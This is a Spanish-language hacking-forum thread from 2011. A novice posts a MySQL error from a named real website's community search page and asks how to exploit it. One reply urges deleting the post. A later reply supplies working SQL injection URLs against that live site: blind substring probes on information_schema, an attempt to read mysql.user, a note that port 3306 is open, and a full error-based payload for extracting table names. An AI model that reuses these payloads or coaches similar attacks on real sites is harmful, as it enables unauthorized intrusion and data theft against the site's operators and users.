Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: groted en 18 Julio 2011, 05:29 am



Título: He encontrado un bug, pero como explotarlo?
Publicado por: groted en 18 Julio 2011, 05:29 am
Bueno soy muy novato etc etc....Y encontre un bug en una web que no para de atacarme.... es este:

Error en la consulta de conteo de registros: SELECT COUNT(*) FROM c_comunidades as co inner join c_categorias as ca ON ca.id_categoria=co.categoria WHERE (nombre LIKE '%'%' or descripcion LIKE '%'%') and eliminado='0' and categoria=' ' ORDER BY fecha desc, idco DESC . Mysql dijo: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or descripcion LIKE '%'%') and eliminado='0' and categoria=' ' ORDER BY fecha' at line 1

BUeno la web es www.onlypost.net (http://www.onlypost.net)el bug esta aqui http://comunidad.onlypost.net/comunidades/buscador-comunidades.php?q=' (http://comunidad.onlypost.net/comunidades/buscador-comunidades.php?q=')

Lo consegui poniendo un ' en el buscador pero claro...... Ni idea de como explotarlo xd
Espero que me podais guiar.....


Título: Re: He encontrado un bug, pero como explotarlo?
Publicado por: .:UND3R:. en 19 Julio 2011, 07:22 am
Borra eso por favor, creo que es una injecciòn SQL


Título: Re: He encontrado un bug, pero como explotarlo?
Publicado por: Shell Root en 19 Julio 2011, 08:54 am
1. No DESCUBRISTE, estás usando un vulnerabilidad que es iSQL -ya existía hace mucho tiempo-.
2. Interfieres con la ejecución de la Query pero no puedes inyectar.
3. Quizás sea una blind.


Título: Re: He encontrado un bug, pero como explotarlo?
Publicado por: Space.Medafighter.X en 19 Julio 2011, 10:31 am
Segúramente se refiere a que encontró un bug en el sitio web y por el contexto se asume que no "descubrió" el método, aunque igualmente considero absurdo discutir quién utilizó por primera vez un método tan elemental basado en el principio de inyección de código.

Fácilmente se puede explotar con substring, length, etc si lo que se pretende es leer datos específicos. La versión "5.0.92-community" tiene information_schema.tables.

http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND/**/(SELECT/**/1/**/FROM/**/information_schema.tables/**/WHERE/**/substring(table_name,1,10)='collations'/**/LIMIT/**/0,1)='1&tipo_buscador2=temas&cat=-1

Da pereza extraer datos mediante blind por lo que también puedes generar mensajes de error -lástima que no puedas leer mysql.user y mucho menos en esta versión de MySQL- :

http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND/**/(SELECT/**/1/**/FROM/**/mysql.user/**/LIMIT/**/0,1)='1&tipo_buscador2=temas&cat=-1

Citar
SELECT command denied to user 'tumusica_new'@'localhost' for table 'user'

O conectarte al puerto de MySQL (el servidor lo tiene abierto) :

Citar
comunidad.onlypost.net [190.210.100.80] 3306 (?) open
>
5.0.92-community K÷é ^?]8?rD9 ,☻              207bheDa;D%'

O incluso generar mensajes de error para extraer datos : http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND(SELECT/**/1/**/FROM(SELECT/**/count(*),concat((SELECT/**/(SELECT/**/(SELECT/**/distinct/**/concat(0x7e,0x27,unhex(Hex(cast(table_name/**/AS/**/char))),0x27,0x7e)/**/FROM/**/information_schema.tables/**/LIMIT/**/1,1))/**/FROM/**/information_schema.tables/**/LIMIT/**/0,1),floor(rand(0)*2))x/**/FROM/**/information_schema.tables/**/group/**/by/**/x)a)/**/AND/**/'1'='1&tipo_buscador2=temas&cat=-1